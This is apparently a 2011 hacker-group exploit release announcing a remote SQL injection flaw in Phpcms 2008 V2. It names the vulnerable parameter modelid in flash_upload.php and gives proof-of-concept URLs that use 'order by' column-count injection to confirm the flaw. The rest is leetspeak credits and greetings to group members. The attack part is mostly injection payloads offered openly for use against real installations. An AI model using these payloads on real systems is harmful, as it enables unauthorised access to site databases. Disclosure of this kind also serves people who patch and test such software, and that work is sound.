62 lines
No EOL
1.7 KiB
Text
Executable file
62 lines
No EOL
1.7 KiB
Text
Executable file
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-{In The Name Of Allah The Mercifull}-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
|
|
|
|
[~] Tybe: REMOTE SQL iNJECTioN
|
|
[~] Vendor: www.phpcms.cn
|
|
|
|
[+] Software: Phpcms 2008 V2
|
|
[+] author: ((R3d-D3v!L))
|
|
[~]
|
|
[+] TEAM: Xp10_hACKEr & 403-T3AM
|
|
[~]
|
|
[?] contact: X[at]hotmail.co.jp
|
|
[-]
|
|
[?] Date: 17.jan.2011
|
|
[?] T!ME: 05:15 am GMT
|
|
[?] Home: WwW.XP10.COM
|
|
[^]? Xp10_hAcKEr
|
|
[?]
|
|
|
|
======================================================================================
|
|
# REMOTE SQL iNJECTioN Vulnerabilities
|
|
======================================================================================
|
|
|
|
[*] Err0r C0N50L3:
|
|
|
|
|
|
http://server/bbs/phpcms_th/flash_upload.php?modelid= EV!L INJECT!ON
|
|
|
|
|
|
|
|
|
|
[*] prove of concept =
|
|
|
|
|
|
http://server/bbs/phpcms_th/flash_upload.php?modelid=1+order+by+20-- (false)
|
|
|
|
|
|
http://server/bbs/phpcms_th/flash_upload.php?modelid=1+order+by+19-- (TruE)
|
|
|
|
|
|
Already Tested on Win Xp
|
|
|
|
[~]-----------------------------{((Xp10_hACkEr))}------------------------------------------------
|
|
#
|
|
#
|
|
[~] Greetz tO: [dolly &MERNA &po!S!ON Sc0rp!0N & ((hetlar jeddaH)) &(Nochelove) &emeliya & NEX ]
|
|
#
|
|
[~]70 ALL ARAB!AN HACKER 3X3PT : LAM3RZ #
|
|
#
|
|
[~] spechial thanks : ((HITLER JEDDAH & rootshell& DR.DAShER& abo shahd &abo mohammed)) ALL XP10 MEMbers #
|
|
#
|
|
[?]spechial SupP0RT : MY M!ND # ?
|
|
#
|
|
[?]4r48!4n.!nforma7!0N.53cur!7y ---> ((R3d D3v!L<---&--->JUPA<---aNd--->Devil ro0t)) #
|
|
#
|
|
[~]spechial FR!ND: XP10.COM -_-_- lurklife.com #
|
|
#
|
|
[~] !'M 4R48!4N 3XPL0!73R. #
|
|
#
|
|
[~]{[(D!R 4ll 0R D!E)]}; #
|
|
#
|
|
[~]---------------------------------------------------------------------------------------------
|
|
|